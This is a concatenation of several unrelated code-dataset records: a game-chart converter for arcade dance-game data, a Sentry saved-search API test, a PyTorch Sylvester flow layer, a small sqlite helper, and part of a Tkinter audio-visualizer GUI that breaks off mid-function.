plt.imshow(im)\nplt.scatter(x1,y1,s=4,c='r')\nplt.scatter(x2,y2,s=4,c='c')\nplt.scatter(x3,y3,s=4,c='violet')\nplt.scatter(x4,y4,s=4)\nplt.show()\n","sub_path":"labels/psd_parse_and_plot.py","file_name":"psd_parse_and_plot.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"625005140","text":"import glob\r\nimport json\r\nimport os\r\nimport shutil\r\n\r\nimport hexdump\r\n\r\nUSE_TIMESIGS = False\r\n\r\ndef read_string(data, offset):\r\n string_bytes = data[offset:data.index(b'\\0', offset)]\r\n return string_bytes.decode('shift-jis').strip('\\0')\r\n\r\n\r\ndef convert_raw_chart(found_charts, song_info=None):\r\n song_id = song_info['song_id']\r\n bpm = song_info['bpm']\r\n\r\n # Parse ttb file for timestamps\r\n ttb_path = os.path.join(\"raw_data_dct\", \"ttb%03d02.bin\" % song_id)\r\n ttb_by_measure = {}\r\n ttb_data = bytearray(open(ttb_path, \"rb\").read())\r\n ttb_header = ttb_data[:8]\r\n ttb_data = ttb_data[8:]\r\n\r\n measure_timestamps = {}\r\n cur_bars = 0\r\n\r\n bpms = {0: 0}\r\n\r\n song_offset_time = int.from_bytes(ttb_data[2:4], 'little')\r\n song_offset = (((song_offset_time * 441) / 75) * 100) / 44100\r\n song_offset = -song_offset\r\n\r\n timing_info_by_bar = {}\r\n requires_timing_info = False\r\n last_time_sig = None\r\n measure_to_beat = {}\r\n last_measure = 0\r\n\r\n cur_bar_len = 4\r\n for i in range(4, len(ttb_data) - 4, 4):\r\n prev_bar_len = cur_bar_len\r\n cur_time = int.from_bytes(ttb_data[i+2:i+4], 'little')\r\n prev_time = int.from_bytes(ttb_data[i+2-4:i+4-4], 'little')\r\n cur_bar_len = int.from_bytes(ttb_data[i-4:i+2-4], 'little')\r\n\r\n cur_timestamp = (((cur_time * 441) / 75) * 100) / 44100\r\n prev_timestamp = (((prev_time * 441) / 75) * 100) / 44100\r\n\r\n if song_offset is None:\r\n song_offset = -prev_timestamp\r\n\r\n d = (cur_bar_len / 4) * 4 if USE_TIMESIGS else 4\r\n cur_bpm = 1 / (((cur_timestamp - prev_timestamp) * (1000 / d)) / 60000)\r\n\r\n # print(cur_bars, \"%04x (%f) %04x (%f)\" % (prev_time, prev_timestamp, cur_time, cur_timestamp), cur_bpm, cur_bar_len)\r\n\r\n if last_time_sig is None or cur_bar_len != last_time_sig:\r\n timing_info_by_bar[cur_bars] = cur_bar_len\r\n last_time_sig = cur_bar_len\r\n\r\n if cur_bar_len != 4:\r\n requires_timing_info = True\r\n\r\n bpms[cur_bars] = cur_bpm\r\n cur_bars += cur_bar_len if USE_TIMESIGS else 4\r\n\r\n if cur_bar_len != 4:\r\n print(\"Found bar of %d in %s\" % (cur_bar_len, song_info['title']))\r\n\r\n ### Handle conversion of chart\r\n chart = \"\"\"#TITLE:%s;\r\n#MUSIC:bgm.mp3;\r\n#PREVIEW:preview.mp3;\r\n#OFFSET:%lf;\r\n#BPMS:%s;\r\n#DISPLAYBPM:%d;\r\n\"\"\" % (song_info.get('title', '(Untitled)'), song_offset, \",\".join([\"%d=%f\" % (k, bpms[k]) for k in bpms]), song_info.get('bpm', 128))\r\n\r\n if requires_timing_info and USE_TIMESIGS:\r\n chart += \"#TIMESIGNATURES:%s;\" % (\",\".join([\"%d=%d=4\" % (k, timing_info_by_bar[k]) for k in timing_info_by_bar]))\r\n\r\n for idx, data in found_charts:\r\n valid_charts = [0, 1, 2, 7, 8]\r\n\r\n if idx not in valid_charts:\r\n continue\r\n\r\n chart_type = {\r\n 0: \"dance-single\",\r\n 1: \"dance-single\",\r\n 2: \"dance-single\",\r\n 3: \"dance-couple\",\r\n 4: \"dance-couple\",\r\n 5: \"dance-couple\",\r\n 7: \"dance-double\",\r\n 8: \"dance-double\",\r\n }[idx]\r\n\r\n chart_diff = {\r\n 0: \"Easy\",\r\n 1: \"Medium\",\r\n 2: \"Hard\",\r\n 3: \"Easy\",\r\n 4: \"Medium\",\r\n 5: \"Hard\",\r\n 7: \"Easy\",\r\n 8: \"Medium\",\r\n }[idx]\r\n\r\n diff_rating = {\r\n 0: song_info['diffs']['single']['basic'],\r\n 1: song_info['diffs']['single']['trick'],\r\n 2: song_info['diffs']['single']['maniac'],\r\n 3: song_info['diffs']['couple']['basic'],\r\n 4: song_info['diffs']['couple']['trick'],\r\n 5: song_info['diffs']['couple']['maniac'],\r\n 7: song_info['diffs']['double']['basic'],\r\n 8: song_info['diffs']['double']['trick'],\r\n }[idx]\r\n\r\n chunks = [data[i:i+8] for i in range(0, len(data), 8)]\r\n events = []\r\n last_measure = 0\r\n\r\n for chunk in chunks:\r\n def get_arrows_str(n):\r\n s = \"\"\r\n s += \"1\" if (n & 8) else \"0\"\r\n s += \"1\" if (n & 4) else \"0\"\r\n s += \"1\" if (n & 2) else \"0\"\r\n s += \"1\" if (n & 1) else \"0\"\r\n return s\r\n\r\n measure = chunk[2]\r\n beat = chunk[3]\r\n cmd = int.from_bytes(chunk[4:], 'little')\r\n\r\n beat = round((beat / 256) * 192)\r\n\r\n event = {\r\n 'measure': measure,\r\n 'beat': beat,\r\n }\r\n\r\n if cmd == 4:\r\n # Is a note\r\n p1_note = chunk[0]\r\n p2_note = chunk[1]\r\n\r\n p1_str = get_arrows_str(p1_note)\r\n p2_str = get_arrows_str(p2_note)\r\n\r\n note_data = p1_str\r\n\r\n if chart_type == \"dance-single\":\r\n if p2_note != 0:\r\n print(\"P2 note has data for single chart\")\r\n # exit(1)\r\n\r\n else:\r\n note_data += p2_str\r\n\r\n event['cmd'] = 'note'\r\n event['data'] = note_data\r\n\r\n elif cmd == 0x100:\r\n # End song\r\n event['cmd'] = 'end'\r\n last_measure = measure + 1\r\n\r\n else:\r\n print(\"Unknown cmd value\", cmd)\r\n exit(1)\r\n\r\n events.append(event)\r\n\r\n if song_info is None:\r\n song_info = {}\r\n\r\n measure_data = {}\r\n for i in range(last_measure):\r\n measure_data[i] = []\r\n\r\n measure_data = {}\r\n for event in events:\r\n if event['cmd'] != \"note\":\r\n continue\r\n\r\n if event['measure'] not in measure_data:\r\n d = \"00000000\" if \"double\" in chart_type else \"0000\"\r\n measure_data[event['measure']] = [d] * 192\r\n\r\n # print(event['beat'], len(measure_data[event['measure']]))\r\n measure_data[event['measure']][event['beat']] = event['data']\r\n\r\n for i in range(last_measure):\r\n if i not in measure_data:\r\n d = \"00000000\" if \"double\" in chart_type else \"0000\"\r\n measure_data[i] = [d]\r\n\r\n arrow_data = \"\\n,\\n\".join([\"\\n\".join(measure_data[k]) for k in sorted(list(measure_data.keys()))])\r\n\r\n chart +=\"\"\"\r\n#NOTES:\r\n %s:\r\n :\r\n %s:\r\n %d:\r\n 0,0,0,0,0:\r\n%s\r\n;\"\"\" % (chart_type, chart_diff, diff_rating, arrow_data)\r\n\r\n return chart\r\n\r\n\r\n\r\nsonglist_info = {}\r\ndata = bytearray(open(\"dct.exe\", \"rb\").read())\r\n\r\nbase_diff = 0x8000f800\r\nsonglist_offset = 0x4d48\r\nsong_count = 0x340 // 0x40\r\n\r\nfor i in range(0, song_count * 0x40, 0x40):\r\n chunk = data[songlist_offset+i:songlist_offset+i+0x40]\r\n\r\n song_id = int.from_bytes(chunk[0x06:0x08], 'little')\r\n is_unlocked = chunk[0]\r\n unk_flag = chunk[1]\r\n timing_type = int.from_bytes(chunk[2:4], 'little')\r\n audio_idx = chunk[0x15]\r\n bpm = int.from_bytes(chunk[0x04:0x06], 'little')\r\n\r\n diffs = {\r\n 'single': {\r\n 'basic': int.from_bytes(chunk[0x24:0x24+2], 'little') / 2,\r\n 'trick': int.from_bytes(chunk[0x26:0x26+2], 'little') / 2,\r\n 'maniac': int.from_bytes(chunk[0x28:0x28+2], 'little') / 2,\r\n },\r\n 'double': {\r\n 'basic': int.from_bytes(chunk[0x34:0x34+2], 'little') / 2,\r\n 'trick': int.from_bytes(chunk[0x36:0x36+2], 'little') / 2,\r\n },\r\n 'couple': {\r\n 'basic': int.from_bytes(chunk[0x2c:0x2c+2], 'little') / 2,\r\n 'trick': int.from_bytes(chunk[0x2e:0x2e+2], 'little') / 2,\r\n 'maniac': int.from_bytes(chunk[0x30:0x30+2], 'little') / 2,\r\n },\r\n }\r\n\r\n title_ptr = int.from_bytes(chunk[8:8+4], 'little') - base_diff\r\n title = read_string(data, title_ptr)\r\n\r\n artist_ptr = int.from_bytes(chunk[12:12+4], 'little') - base_diff\r\n artist = read_string(data, artist_ptr)\r\n\r\n image_ptr = int.from_bytes(chunk[16:16+4], 'little') - base_diff\r\n image = read_string(data, image_ptr)\r\n\r\n songlist_info[song_id] = {\r\n 'song_id': song_id,\r\n 'title': title,\r\n 'artist': artist,\r\n 'title_image': image,\r\n 'diffs': diffs,\r\n 'bpm': bpm,\r\n 'timing_type': timing_type,\r\n 'is_unlocked': is_unlocked,\r\n 'bgm_filename': \"D%04d.MP3\" % (audio_idx - 2),\r\n 'preview_filename': \"D%04d.MP3\" % (audio_idx - 28),\r\n }\r\n\r\n print(title)\r\n hexdump.hexdump(chunk)\r\n print()\r\n\r\n\r\nfor filename in glob.glob(\"raw_data_dct/seq*.bin\"):\r\n data = bytearray(open(filename, \"rb\").read())\r\n\r\n header = data[:0x78]\r\n data = data[0x78:]\r\n\r\n found_charts = []\r\n for i in range(0, len(header), 0x0c):\r\n idx = i // 0x0c\r\n exists = int.from_bytes(header[i:i+4], 'little')\r\n length = int.from_bytes(header[i+4:i+8], 'little') * 8\r\n offset = int.from_bytes(header[i+8:i+12], 'little') * 8\r\n\r\n if exists == 0:\r\n assert(length == 0 and offset == 0)\r\n continue\r\n\r\n # print(\"%d %d %04x %04x | %08x -> %08x (%08x)\" % (idx, exists, length, offset, offset, offset + length, len(data)))\r\n\r\n chart_data = data[offset:offset+length]\r\n found_charts.append((idx, chart_data))\r\n\r\n if len(found_charts) != 5:\r\n print(\"Found %d charts in %s\" % (len(found_charts), filename))\r\n\r\n basename = os.path.splitext(os.path.basename(filename))[0]\r\n song_id = int(basename[3:6], 10)\r\n\r\n song_info = songlist_info.get(song_id, None)\r\n if song_info is not None:\r\n basename = song_info['title']\r\n\r\n else:\r\n song_info = {\r\n 'title': \"Unknown\",\r\n 'song_id': song_id,\r\n 'bpm': 128,\r\n 'diffs': {\r\n 'single': {\r\n 'basic': 1,\r\n 'trick': 2,\r\n 'maniac': 3,\r\n },\r\n 'double': {\r\n 'basic': 1,\r\n 'trick': 2,\r\n },\r\n 'couple': {\r\n 'basic': 1,\r\n 'trick': 2,\r\n 'maniac': 3,\r\n },\r\n }\r\n }\r\n\r\n basepath = os.path.join(\"charts_output_dct\", basename)\r\n os.makedirs(basepath, exist_ok=True)\r\n\r\n for idx, chart in found_charts:\r\n chart_mapping = {\r\n 0: \"single_basic.bin\",\r\n 1: \"single_trick.bin\",\r\n 2: \"single_maniac.bin\",\r\n 3: \"couple_basic.bin\",\r\n 4: \"couple_trick.bin\",\r\n 5: \"couple_maniac.bin\",\r\n 7: \"double_basic.bin\",\r\n 8: \"double_trick.bin\",\r\n }\r\n\r\n chart_filename = chart_mapping.get(idx, \"%02d.bin\" % idx)\r\n\r\n if idx not in chart_mapping:\r\n print(\"Found unknown chart\", idx)\r\n\r\n # open(os.path.join(basepath, chart_filename), \"wb\").write(chart)\r\n\r\n # if \"night\" in song_info['title'].lower():\r\n try:\r\n chart_converted = convert_raw_chart(found_charts, song_info)\r\n open(os.path.join(basepath, \"chart.sm\"), \"w\").write(chart_converted)\r\n except:\r\n print(\"Couldn't convert %s\" % (filename))\r\n\r\n # if song_info is not None:\r\n # # json.dump(song_info, open(os.path.join(basepath, \"_metadata.json\"), \"w\"), indent=4)\r\n\r\n # if 'bgm_filename' in song_info:\r\n # shutil.copyfile(os.path.join(\"cd_data\", song_info['bgm_filename']), os.path.join(basepath, \"bgm.mp3\"))\r\n\r\n # if 'preview_filename' in song_info:\r\n # shutil.copyfile(os.path.join(\"cd_data\", song_info['preview_filename']), os.path.join(basepath, \"preview.mp3\"))\r\n\r\n # shutil.copyfile(filename, os.path.join(basepath, os.path.basename(filename)))\r\n\r\n","sub_path":"sys573/tools/parse_charts_dct.py","file_name":"parse_charts_dct.py","file_ext":"py","file_size_in_byte":11747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"35834586","text":"from __future__ import absolute_import\n\nfrom django.utils import timezone\nfrom exam import fixture\n\nfrom sentry.api.serializers import serialize\nfrom sentry.models import SavedSearch\nfrom sentry.models.savedsearch import DEFAULT_SAVED_SEARCHES\nfrom sentry.testutils import APITestCase\n\n\nclass OrganizationSearchesListTest(APITestCase):\n endpoint = 'sentry-api-0-organization-searches'\n\n @fixture\n def user(self):\n return self.create_user('test@test.com')\n\n def test_simple(self):\n self.login_as(user=self.user)\n team = self.create_team(members=[self.user])\n project1 = self.create_project(teams=[team], name='foo')\n project2 = self.create_project(teams=[team], name='bar')\n\n SavedSearch.objects.create(\n project=project1,\n name='bar',\n query=DEFAULT_SAVED_SEARCHES[0]['query'],\n )\n included = [\n SavedSearch.objects.create(\n name='Global Query',\n query=DEFAULT_SAVED_SEARCHES[0]['query'],\n is_global=True,\n date_added=timezone.now().replace(microsecond=0)\n ),\n SavedSearch.objects.create(\n project=project1,\n name='foo',\n query='some test',\n date_added=timezone.now().replace(microsecond=0)\n ),\n SavedSearch.objects.create(\n project=project1,\n name='wat',\n query='is:unassigned is:unresolved',\n date_added=timezone.now().replace(microsecond=0)\n ),\n SavedSearch.objects.create(\n project=project2,\n name='foo',\n query='some test',\n date_added=timezone.now().replace(microsecond=0)\n ),\n ]\n\n included.sort(key=lambda search: (search.name, search.id))\n response = self.get_valid_response(self.organization.slug)\n response.data.sort(key=lambda search: (search['name'], search['projectId']))\n assert response.data == serialize(included)\n\n\nclass OrgLevelOrganizationSearchesListTest(APITestCase):\n endpoint = 'sentry-api-0-organization-searches'\n\n @fixture\n def user(self):\n return self.create_user('test@test.com')\n\n def get_response(self, *args, **params):\n params['use_org_level'] = '1'\n return super(OrgLevelOrganizationSearchesListTest, self).get_response(\n *args,\n **params\n )\n\n def create_base_data(self):\n team = self.create_team(members=[self.user])\n SavedSearch.objects.create(\n project=self.create_project(teams=[team], name='foo'),\n name='foo',\n query='some test',\n date_added=timezone.now().replace(microsecond=0)\n )\n SavedSearch.objects.create(\n organization=self.organization,\n owner=self.create_user(),\n name='foo',\n query='some other user\\'s query',\n date_added=timezone.now().replace(microsecond=0)\n )\n included = [\n SavedSearch.objects.create(\n name='Global Query',\n query=DEFAULT_SAVED_SEARCHES[0]['query'],\n is_global=True,\n date_added=timezone.now().replace(microsecond=0)\n ),\n SavedSearch.objects.create(\n organization=self.organization,\n name='foo',\n query='some test',\n date_added=timezone.now().replace(microsecond=0)\n ),\n SavedSearch.objects.create(\n organization=self.organization,\n name='wat',\n query='is:unassigned is:unresolved',\n date_added=timezone.now().replace(microsecond=0)\n ),\n ]\n return included\n\n def check_results(self, expected):\n self.login_as(user=self.user)\n expected.sort(key=lambda search: (not search.is_pinned, search.name.lower()))\n response = self.get_valid_response(self.organization.slug)\n assert response.data == serialize(expected)\n\n def test_simple(self):\n included = self.create_base_data()\n self.check_results(included)\n\n def test_pinned(self):\n included = self.create_base_data()\n pinned_query = SavedSearch.objects.create(\n organization=self.organization,\n owner=self.user,\n name='My Pinned Query',\n query='pinned junk',\n date_added=timezone.now().replace(microsecond=0)\n )\n included.append(pinned_query)\n self.check_results(included)\n # Check a pinned query that uses an existing query correctly filters\n # the existing query\n to_be_pinned = included.pop()\n to_be_pinned.is_pinned = True\n pinned_query.query = to_be_pinned.query\n pinned_query.save()\n included[0] = to_be_pinned\n self.check_results(included)\n","sub_path":"tests/sentry/api/endpoints/test_organization_searches.py","file_name":"test_organization_searches.py","file_ext":"py","file_size_in_byte":4988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"24579028","text":"\n\nfrom xai.brain.wordbase.nouns._madman import _MADMAN\n\n#calss header\nclass _MADMEN(_MADMAN, ):\n\tdef __init__(self,): \n\t\t_MADMAN.__init__(self)\n\t\tself.name = \"MADMEN\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"madman\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_madmen.py","file_name":"_madmen.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"169625865","text":"#!/usr/bin/env python3\n\nimport torch.nn as nn\nimport torch\nimport torch.nn.functional as F\nimport numpy as np\n\nclass Sylvester(nn.Module):\n \"\"\"\n Sylvester normalizing flow.\n \"\"\"\n\n def __init__(self, num_ortho_vecs):\n\n super(Sylvester, self).__init__()\n\n self.num_ortho_vecs = num_ortho_vecs\n\n self.h = nn.Tanh()\n\n triu_mask = torch.triu(torch.ones(num_ortho_vecs, num_ortho_vecs), diagonal=1).unsqueeze(0)\n diag_idx = torch.arange(0, num_ortho_vecs).long()\n\n self.register_buffer('triu_mask', torch.Tensor(triu_mask))\n self.triu_mask.requires_grad = False\n self.register_buffer('diag_idx', diag_idx)\n\n def der_h(self, x):\n return self.der_tanh(x)\n\n def der_tanh(self, x):\n return 1 - self.h(x) ** 2\n\n def _forward(self, zk, r1, r2, q_ortho, b, sum_ldj=True):\n \"\"\"\n All flow parameters are amortized. Conditions on diagonals of R1 and R2 for invertibility need to be satisfied\n outside of this function. Computes the following transformation:\n z' = z + QR1 h( R2Q^T z + b)\n or actually\n z'^T = z^T + h(z^T Q R2^T + b^T)R1^T Q^T\n :param zk: shape: (batch_size, z_size)\n :param r1: shape: (batch_size, num_ortho_vecs, num_ortho_vecs)\n :param r2: shape: (batch_size, num_ortho_vecs, num_ortho_vecs)\n :param q_ortho: shape (batch_size, z_size , num_ortho_vecs)\n :param b: shape: (batch_size, 1, self.z_size)\n :return: z, log_det_j\n \"\"\"\n\n # Amortized flow parameters\n zk = zk.unsqueeze(1)\n\n # Save diagonals for log_det_j\n diag_r1 = r1[:, self.diag_idx, self.diag_idx]\n diag_r2 = r2[:, self.diag_idx, self.diag_idx]\n\n r1_hat = r1\n r2_hat = r2\n\n qr2 = torch.bmm(q_ortho, r2_hat.transpose(2, 1))\n qr1 = torch.bmm(q_ortho, r1_hat)\n\n r2qzb = torch.bmm(zk, qr2) + b\n z = torch.bmm(self.h(r2qzb), qr1.transpose(2, 1)) + zk\n z = z.squeeze(1)\n\n # Compute log|det J|\n # Output log_det_j in shape (batch_size) instead of (batch_size,1)\n diag_j = diag_r1 * diag_r2\n diag_j = self.der_h(r2qzb).squeeze(1) * diag_j\n diag_j += 1.\n log_diag_j = diag_j.abs().log()\n\n if sum_ldj:\n log_det_j = log_diag_j.sum(-1)\n else:\n log_det_j = log_diag_j\n\n return z, log_det_j\n\n def forward(self, zk, r1, r2, q_ortho, b, sum_ldj=True):\n\n return self._forward(zk, r1, r2, q_ortho, b, sum_ldj)\n\n","sub_path":"lib_snf/flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"109244824","text":"import sqlite3\n\n\nclass DbConnect():\n def __init__(self):\n self.conn = sqlite3.connect('db.sqlite3')\n\n def insertNotifications(self,username,stock,action):\n cur = self.conn.cursor()\n cur.execute(\n 'INSERT INTO myapp_notificationType (username,stock, notificationType) values (?, ?, ?)',\n (username, stock, action))\n self.conn.commit()\n self.conn.close()","sub_path":"myapp/database_connections/db_connections.py","file_name":"db_connections.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"523163995","text":"from FanBlender import FanBlender, __version__\nfrom FanTkImageViewer import ImageViewer\nfrom LanguagePack import *\n\nimport threading, os, pickle, ctypes\nimport tkinter as tk\nfrom tkinter import ttk\nimport tkinter.messagebox\nfrom tkinter.filedialog import askopenfilename\nfrom tkinter.filedialog import askdirectory\nfrom tkinter import scrolledtext\n\n\"\"\"\nAudio Visualizer - GUI\nBy Twitter @FanKetchup\nhttps://github.com/FerryYoungFan/FanselineVisualizer\n\"\"\"\n\n# GUI Language\nlang = lang_en\nlang_code = \"en\"\n\n\n# lang = lang_cn_s\n\ndef clog(content=\"\", insertloc='end'):\n global scr\n scr.configure(state='normal')\n scr.insert(insertloc, content)\n scr.configure(state='disable')\n scr.see(\"end\")\n\n\ndef clearLog():\n global scr\n scr.configure(state='normal')\n scr.delete('1.0', tk.END)\n clog(\"*\" * 35 + \" \" + lang[\"Welcome to use\"] + \" \" + lang[\"Fanseline Audio Visualizer\"] + \"!\" \\\n + \" \" + \"*\" * 35 + \"\\n\\n\")\n clog(lang[\"Project Website: \"] + \"https://github.com/FerryYoungFan/FanselineVisualizer\" + \"\\n\\n\")\n\n\nclass InfoBridge:\n def __init__(self):\n pass\n\n def log(self, content=\"\"):\n clog(content + \"\\n\")\n\n def progressbar(self, value, total):\n global progress\n progress[\"value\"] = (100 * value / total)\n\n def freeze(self, flag=True):\n global isRunning\n if flag:\n fg = \"disabled\"\n self.progressbar(0, 100)\n btn_blend[\"text\"] = lang[\"Stop Blending\"]\n isRunning = True\n root.title(lang[\"Fanseline Audio Visualizer\"] + \" -V.\" + __version__ + \" \" + lang[\"(Running)\"])\n else:\n fg = \"normal\"\n self.progressbar(0, 100)\n btn_blend[\"text\"] = lang[\"Blend & Export\"]\n isRunning = False\n root.title(lang[\"Fanseline Audio Visualizer\"] + \" -V.\" + __version__)\n elem = [entry_audio, btn_audio, entry_fname, btn_output, entry_img, btn_img, entry_logo, btn_logo,\n entry_text, entry_font, btn_font, entry_width, entry_height, entry_fps, entry_brv, btn_autob,\n entry_low, entry_up, entry_bins, entry_scalar, list_color, list_bra, check_normal, list_preseta,\n list_presetv, entry_output, label_mp4, label_textplz, label_font, label_size, label_mul,\n label_fps, label_brv, label_range, label_to, label_hz, label_bins, label_scalar, label_color,\n label_bra, label_kbps, label_preseta, label_presetv, list_lang, label_lang, label_smooth, list_smooth,\n entry_bg, btn_bg, entry_relsize, check_use_glow, label_bright, entry_bright, label_bg_mode,\n list_bg_mode, label_style, list_style, label_linewidth, entry_linewidth, entry_rotate, label_rotate,\n label_saturation, entry_saturation, label_text_brt, entry_text_brt]\n for el in elem:\n el[\"state\"] = fg\n\n if not flag:\n list_color[\"state\"] = \"readonly\"\n list_preseta[\"state\"] = \"readonly\"\n list_presetv[\"state\"] = \"readonly\"\n list_lang[\"state\"] = \"readonly\"\n list_bg_mode[\"state\"] = \"readonly\"\n list_style[\"state\"] = \"readonly\"\n root_view.withdraw()\n\n def realTime(self, img):\n global frame2\n if frame2.winfo_viewable():\n frame2.imshow(img)\n\n\nimg_format_dict = \"*.jpg *.jpeg *.png *.gif *.bmp *.ico *.dib *.webp *.tiff *.tga\"\n\n\ndef selectImage():\n try:\n global tk_image_path\n pathread = askopenfilename(\n filetypes=[(lang[\"Image files\"], img_format_dict), (lang[\"All files\"], \"*.*\")])\n if not pathread or not os.path.exists(pathread):\n return\n else:\n tk_image_path.set(pathread)\n entry_img.xview(\"end\")\n clog(lang[\"Foreground Selected: \"])\n clog(pathread + '\\n')\n fastPreview()\n except:\n return\n\n\ndef selectLogo():\n try:\n global tk_logo_path\n pathread = askopenfilename(\n filetypes=[(lang[\"Image files\"], img_format_dict), (lang[\"All files\"], \"*.*\")])\n if not pathread or not os.path.exists(pathread):\n return\n else:\n tk_logo_path.set(pathread)\n entry_logo.xview(\"end\")\n clog(lang[\"Logo Selected: \"])\n clog(pathread + '\\n')\n fastPreview()\n except:\n return\n\n\ndef selectBG():\n try:\n global tk_bg_path\n pathread = askopenfilename(\n filetypes=[(lang[\"Image files\"], img_format_dict), (lang[\"All files\"], \"*.*\")])\n if not pathread or not os.path.exists(pathread):\n return\n else:\n tk_bg_path.set(pathread)\n entry_bg.xview(\"end\")\n clog(lang[\"Background Selected: \"])\n clog(pathread + '\\n')\n fastPreview()\n except:\n return\n\n\ndef selectAudio():\n try:\n global tk_sound_path, tk_output_path, tk_filename\n pathread = askopenfilename(\n filetypes=[(lang[\"Audio files\"], \"*.mp3 *.wav *.ogg *.aac *.flac *.ape *.m4a *.m4r *.wma *.mp2 *.mmf\"),\n (lang[\"Video files\"], \"*.mp4 *.wmv *.avi *.flv *.mov *.mkv *.rm *.rmvb\"),\n (lang[\"All files\"], \"*.*\")])\n if not pathread or not os.path.exists(pathread):\n return\n else:\n tk_sound_path.set(pathread)\n entry_audio.xview(\"end\")\n vdic = getAllValues()\n if vdic[\"output_path\"] is None:\n tk_output_path.set(os.path.dirname(os.path.realpath(pathread)).replace(\"\\\\\", \"/\") + \"/\")\n entry_output.xview(\"end\")\n new_name = (os.path.splitext(pathread)[0].split(\"/\")[-1]) + lang[\"_Visualize\"]\n tk_filename.set(new_name)\n entry_fname.xview(\"end\")\n clog(lang[\"Audio Selected: \"])\n clog(tk_sound_path.get() + '\\n')\n except:\n return\n\n\ndef selectOutput():\n try:\n global tk_output_path\n pathexport = askdirectory()\n pathexport = pathexport + '/'\n if not pathexport or pathexport == \"/\":\n return\n else:\n tk_output_path.set(pathexport)\n entry_output.xview(\"end\")\n clog(lang[\"Output Path Selected: \"])\n clog(tk_output_path.get() + '\\n')\n except:\n return\n\n\ndef selectFont():\n global tk_font, tk_text\n try:\n pathread = askopenfilename(filetypes=[(lang[\"Font files\"], \"*.ttf *.otf\"), (lang[\"All files\"], \"*.*\")])\n if not pathread:\n return\n else:\n tk_font.set(pathread)\n entry_font.xview(\"end\")\n clog(lang[\"Font Selected: \"])\n clog(pathread + '\\n')\n fastPreview()\n except:\n return\n\n\ndef getAllValues():\n global tk_image_path, tk_sound_path, tk_logo_path, tk_output_path, tk_filename, \\\n tk_text, tk_font, tk_bins, tk_fq_low, tk_fq_high, color_dic, list_color, tk_scalar, \\\n tk_width, tk_height, tk_fps, tk_br_video, tk_br_audio, tk_audio_normal, tk_smooth, \\\n tk_bg_path, tk_bright, tk_blur_bg, tk_use_glow, tk_relsize, tk_bg_mode, bg_mode_dic, \\\n tk_style, tk_linewidth, style_dic, tk_rotate, tk_saturation, tk_text_brt\n\n def checkStr(strtk):\n if strtk.get():\n return strtk.get()\n else:\n return None\n\n def checkFile(strtk):\n path = checkStr(strtk)\n if path is not None:\n if os.path.exists(path):\n return path\n return None\n\n def checkInt(inttk):\n\n try:\n num = float(inttk.get())\n except:\n return None\n else:\n return int(round(num))\n\n def checkFloat(floattk):\n try:\n num = float(floattk.get())\n except:\n return None\n else:\n return num\n\n if checkStr(tk_filename) is not None:\n fname = checkStr(tk_filename) + \".mp4\"\n else:\n fname = None\n\n param_dict = {\n \"image_path\": checkFile(tk_image_path),\n \"bg_path\": checkFile(tk_bg_path),\n \"sound_path\": checkFile(tk_sound_path),\n \"logo_path\": checkFile(tk_logo_path),\n \"output_path\": checkStr(tk_output_path),\n \"filename\": fname,\n \"text\": checkStr(tk_text),\n \"font\": checkStr(tk_font),\n \"text_brt\": checkFloat(tk_text_brt),\n\n \"bins\": checkInt(tk_bins),\n \"lower\": checkInt(tk_fq_low),\n \"upper\": checkInt(tk_fq_high),\n \"color\": color_dic[checkStr(list_color)],\n \"scalar\": checkFloat(tk_scalar),\n \"smooth\": checkInt(tk_smooth),\n \"bright\": checkFloat(tk_bright),\n \"saturation\": checkFloat(tk_saturation),\n\n \"blur_bg\": bg_mode_dic[checkStr(tk_bg_mode)][0],\n \"bg_mode\": bg_mode_dic[checkStr(tk_bg_mode)][1],\n \"use_glow\": tk_use_glow.get(),\n \"relsize\": checkFloat(tk_relsize),\n\n \"width\": checkInt(tk_width),\n \"height\": checkInt(tk_height),\n \"fps\": checkFloat(tk_fps),\n \"br_Mbps\": checkFloat(tk_br_video),\n\n \"normal\": tk_audio_normal.get(),\n \"br_kbps\": checkInt(tk_br_audio),\n\n \"style\": style_dic[checkStr(tk_style)],\n \"linewidth\": checkFloat(tk_linewidth),\n \"rotate\": checkFloat(tk_rotate),\n\n }\n return param_dict\n\n\ndef dict2tuple(dict_input):\n keys = []\n for key in dict_input.keys():\n keys.append(key)\n return tuple(keys)\n\n\ndef autoBitrate():\n vdic = getAllValues()\n global tk_br_video\n if vdic[\"width\"] is not None and vdic[\"height\"] is not None and vdic[\"fps\"] is not None:\n brv = getDefaultBR(vdic[\"width\"], vdic[\"height\"], vdic[\"fps\"], 4)\n tk_br_video.set(round(brv * 100) / 100)\n\n\ndef setBlender(param_dict):\n global fb\n fb.setConsole(InfoBridge())\n fb.setFilePath(image_path=param_dict[\"image_path\"],\n bg_path=param_dict[\"bg_path\"],\n sound_path=param_dict[\"sound_path\"],\n logo_path=param_dict[\"logo_path\"])\n fb.setOutputPath(output_path=param_dict[\"output_path\"],\n filename=param_dict[\"filename\"])\n fb.setText(text=param_dict[\"text\"], font=param_dict[\"font\"],\n relsize=param_dict[\"relsize\"], text_brt=param_dict[\"text_brt\"])\n fb.setSpec(bins=param_dict[\"bins\"], lower=param_dict[\"lower\"], upper=param_dict[\"upper\"],\n color=param_dict[\"color\"], bright=param_dict[\"bright\"], saturation=param_dict[\"saturation\"],\n scalar=param_dict[\"scalar\"], smooth=param_dict[\"smooth\"],\n style=param_dict[\"style\"], linewidth=param_dict[\"linewidth\"])\n fb.setVideoInfo(width=param_dict[\"width\"], height=param_dict[\"height\"],\n fps=param_dict[\"fps\"], br_Mbps=param_dict[\"br_Mbps\"],\n blur_bg=param_dict[\"blur_bg\"], 